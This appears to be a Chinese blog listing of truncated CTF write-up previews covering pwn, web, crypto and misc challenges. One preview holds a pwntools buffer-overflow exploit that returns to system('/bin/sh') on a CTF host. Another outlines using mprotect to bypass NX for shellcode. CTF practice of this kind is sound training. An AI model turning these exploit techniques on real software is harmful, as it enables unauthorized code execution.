32位 NX开启 提示mprotect mprotect()函数可以修改调用进程内存页的保护属性 所以利用mprotect函数，就可以绕过NX 从而达到写入shellcode的目的 int ctfshow(){  _BYTE v1[14]; // [esp+6h] [ebp-12h] BYREF​  re…

签到题2 exp: from pwn import *u=remote("node1.anna.nssctf.cn",28532)call_system=0x08048641bin_sh=0x0804863Apayload=b'a'*(0x64+4)+p32(call_system)+p32(0x0)+p32(bin_sh)u.sendline(p…

PWN——CTFshow pwn39 一个32位程序 Arch:       i386-32-littleRELRO:     Partial RELROStack:     No canary foundNX:         NX en…

一、汇编语言简介 汇编语言是计算机硬件与高级语言之间的桥梁，它直接操作计算机的硬件资源。在CTF的Pwn方向中，汇编语言是理解程序底层运行机制和漏洞利用的关键工具。以下内容主要基于x86和x86_64架构展开。 二、基础汇编指令 1. 数据传输指令 mov：用于数据的移动。例如：mov eax, 1          ; 将立即数1赋值给寄存器ea…

ATTACK续 alert 进入题目环境，得到的是一个空白页面，只有一个提示框在反复出现 法1 用view-source协议，查看源码 翻阅发现底下有行小字 flag{3d527&…

九九归一 打开附件 69 56 42 4f 52 77 30 4b 47 67 6f 41 41 41 41 4e 53 55 68 45 55 67 41 41 41 44 77 41 41 41 41 38 41 51 41 41 41 41 41 53 68 2b 54 66 41 41 41 41 55 45 6c 45 51 56 52 …

Easy 根据给出的加密算法和密文 编写一个解密程序 def rc4(key, data):    key_length = len(key)    s = list(range(256))    j = 0    for i in range(256):  …

Easy_Data Flag得分： 28.47 得分次序： 140 公司的DLP软件报警了，并上传了一段流量。你能帮bob分析下为什么会产生报警么？ misc_easy_data下载 5G网络隐私保护 213.33PT 新技术应用 Flag得分： 380 得分次序： 67 Get_supi 在某些场景下，LTE网络中用户的IMSI会在空口暴露，5G…

[ ] （没记题号） 大概就是一个加密了的zip文件，没用爆破 把附件拿winhex看看 看到password，输入，打开zip 得到flag Hello-web 注释里面看第一段flag 响应包看第二段flag Caesar Cipher [Week 1] hello_http [Week 1] 0xGame2048 [Week 1] 0. te…

php支持的伪协议： 1 file:// — 访问本地文件系统2 http:// — 访问 HTTP(s) 网址3 ftp:// — 访问 FTP(s) URLs4 php:// — 访问各个输入/输出流（I/O streams）5 zlib:// — 压缩流6 data:// — 数据（RFC 2397）7 glob:// — 查找匹配的文件路径…